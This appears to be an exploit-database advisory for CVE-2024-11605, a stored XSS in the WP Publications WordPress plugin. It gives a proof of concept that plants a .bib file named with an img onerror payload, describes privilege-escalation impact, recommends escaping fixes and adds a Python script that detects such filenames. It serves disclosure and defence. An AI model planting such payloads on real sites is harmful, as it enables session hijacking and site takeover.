| Title | Published | Views | Reporter |
|---|---|---|---|
| CVE-2024-11605 | 27 Dec 2024 06:11 | – | circl |
| WordPress plugin wp-publications security vulnerability | 27 Dec 2024 00:00 | – | cnnvd |
| WordPress plugin wp-publications cross-site scripting vulnerability | 3 Jan 2025 00:00 | – | cnvd |
| CVE-2024-11605 | 27 Dec 2024 06:00 | – | cve |
| CVE-2024-11605 WP Publications <= 1.2 - Admin+ Stored XSS | 27 Dec 2024 06:00 | – | cvelist |
| WP Publications WordPress Plugin 1.2 - Stored XSS | 16 Jul 2025 00:00 | – | exploitdb |
| CVE-2024-11605 | 27 Dec 2024 06:15 | – | nvd |
| WordPress WP Publications plugin <= 1.2 - Admin+ Stored XSS vulnerability | 27 Dec 2024 06:41 | – | patchstack |
| PT-2024-17132 · WordPress · Wp-Publications | 27 Dec 2024 00:00 | – | ptsecurity |
| CVE-2024-11605 | 23 May 2025 06:37 | – | redhatcve |
# Exploit Title: WP Publications WordPress Plugin 1.2 - Stored XSS
# Google Dork: inurl:/wp-content/plugins/wp-publications/
# Date: 2025-07-15
# Exploit Author: Zeynalxan Quliyev
# Vendor Homepage: https://wordpress.org/plugins/wp-publications/
# Software Link: https://downloads.wordpress.org/plugin/wp-publications.1.2.zip
# Version: <= 1.2
# Tested on: WordPress 6.5.3 / Linux (Apache)
# CVE: CVE-2024-11605
## Vulnerability Details
The WP Publications plugin for WordPress (versions <= 1.2) is vulnerable to **Stored Cross-Site Scripting (XSS)**. The plugin's bundled BibTeX browser lists the `.bib` files it finds and writes each filename into the page without HTML escaping, so a high-privileged user (such as an administrator) who can place a file with a crafted name in the plugin directory can inject arbitrary HTML and JavaScript that runs for everyone who later opens the listing.
Because the payload lives in a filename rather than in post content, WordPress's `unfiltered_html` capability does not govern it. The vulnerability is therefore exploitable even in configurations where that capability has been removed from administrators, as is the default for site admins in multisite installations.
---
## Proof of Concept (PoC)
1. SSH into the server (or use any other route that lets a high-privileged user write a file into the plugin directory) and change into it:
```bash
cd /var/www/html/wp-content/plugins/wp-publications/
```
2. Run the following command to create a malicious BibTeX file:
```bash
touch "<img src=x onerror=alert('XSS')>.bib"
```
3. Access the plugin's BibTeX browser via the following URL:
```
https://example.com/wp-content/plugins/wp-publications/bibtexbrowser.php?frameset&bib=
```
4. The listing emits the filename verbatim, so the browser parses the `<img>` tag, fails to load `x`, and runs the `onerror` handler, executing the XSS payload:
```javascript
alert('XSS');
```
---
## Impact
* Stored XSS: the JavaScript runs in the origin of the WordPress site in the browser of any user who opens the BibTeX browser page, including logged-in administrators.
* Bypasses the `unfiltered_html` restriction, including in multisite environments, because the payload is a filename rather than post content.
* Executed in an administrator's session it can drive authenticated requests with that session (e.g., creating users, which amounts to privilege escalation), read cookies that are not `HttpOnly` (WordPress sets its own authentication cookies `HttpOnly`, so session riding is the more realistic route), or inject malicious content into the site.
---
## Recommendation
Update to a version of the plugin that escapes filenames before rendering them (for text nodes `htmlspecialchars()` or WordPress's `esc_html()`, for attribute values `esc_attr()`, and for the `bib=` query value `rawurlencode()`). If no fixed version is available, disable the plugin. In either case, inspect the plugin's BibTeX directory for `.bib` filenames containing `<`, `>`, `"`, `'` or `&`, since any such file already present keeps firing until it is removed.
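The PoC above and the escaping recommendation rest on the same mechanism: a filename dropped into markup verbatim becomes live HTML. The following Python script, an added example that is not part of the original advisory or of the WP Publications plugin, reproduces that rendering step in miniature (a hypothetical `render_listing_unsafe` mirroring the flaw next to a hardened `render_listing_safe`) and adds the check a responder would run on a site: `find_suspicious_names` flags `.bib` filenames that carry HTML metacharacters, and `scan_directory` applies it to a real plugin directory. The filenames used are constructed for the demonstration.

```python
import html
import os
import re
from urllib.parse import quote

# Characters that must never appear raw inside an HTML text node or attribute.
HTML_META = re.compile(r"""[<>"'&]""")

# Constructed sample listing: one benign file plus the advisory's PoC filename.
SAMPLE_NAMES = [
    "references.bib",
    "<img src=x onerror=alert('XSS')>.bib",
]


def render_listing_unsafe(names):
    """Mirror the flaw: the filename goes into the markup verbatim, so a
    name containing a tag is parsed as HTML by the visitor's browser."""
    return "\n".join(f'<li><a href="?bib={n}">{n}</a></li>' for n in names)


def render_listing_safe(names):
    """Hardened form: escape the filename for the text node (and quotes for
    attribute contexts) and URL-encode the query value, so the name cannot
    break out of either context."""
    return "\n".join(
        f'<li><a href="?bib={quote(n, safe="")}">{html.escape(n, quote=True)}</a></li>'
        for n in names
    )


def find_suspicious_names(names):
    """Return .bib filenames that contain HTML metacharacters. A legitimate
    BibTeX file has no business carrying <, >, quotes or & in its name."""
    return [n for n in names if n.lower().endswith(".bib") and HTML_META.search(n)]


def scan_directory(path):
    """Apply the check to an on-disk directory (e.g. the plugin's bib folder).
    The path is supplied by the operator; nothing here assumes a layout."""
    return find_suspicious_names(sorted(os.listdir(path)))


def demo():
    """Render the constructed listing both ways and run the filename check."""
    return {
        "unsafe": render_listing_unsafe(SAMPLE_NAMES),
        "safe": render_listing_safe(SAMPLE_NAMES),
        "flagged": find_suspicious_names(SAMPLE_NAMES),
    }


if __name__ == "__main__":
    result = demo()
    print("Unsafe listing:\n" + result["unsafe"])
    print("\nHardened listing:\n" + result["safe"])
    print("\nSuspicious filenames:", result["flagged"])
```

Run `scan_directory("/path/to/wp-content/plugins/wp-publications/")` against a live site to confirm nothing is already planted; the hardened renderer shows what the plugin's output should look like after a fix, with the PoC name neutralised to `&lt;img ...&gt;.bib` in the link text and percent-encoded in the `href`.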
---
## References
* [CVE-2024-11605 on NVD](https://nvd.nist.gov/vuln/detail/CVE-2024-11605)
* [WP Plugin Page](https://wordpress.org/plugins/wp-publications/)